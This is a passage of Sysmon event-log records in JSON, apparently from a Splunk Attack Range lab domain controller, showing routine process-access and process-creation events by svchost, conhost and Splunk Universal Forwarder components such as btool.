{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1963,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1964,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1965,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1966,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1967,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1968,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","TargetProcessId":"3864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1969,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.396\r\nSourceProcessGUID: {E2A3D6B1-106E-5F25-0000-0010C1E00300}\r\nSourceProcessId: 3864\r\nSourceThreadId: 3856\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.396","SourceProcessGUID":"{E2A3D6B1-106E-5F25-0000-0010C1E00300}","SourceProcessId":"3864","SourceThreadId":"3856","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1970,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.437\r\nProcessGuid: {E2A3D6B1-106E-5F25-0000-00100EE40300}\r\nProcessId: 3964\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nParentProcessId: 3896\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.437","ProcessGuid":"{E2A3D6B1-106E-5F25-0000-00100EE40300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-106D-5F25-0000-001067C70300}","ParentProcessId":"3896","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1971,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nSourceProcessId: 3896\r\nSourceThreadId: 3920\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-00100EE40300}\r\nTargetProcessId: 3964\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-001067C70300}","SourceProcessId":"3896","SourceThreadId":"3920","SourceImage":"C:\\Program 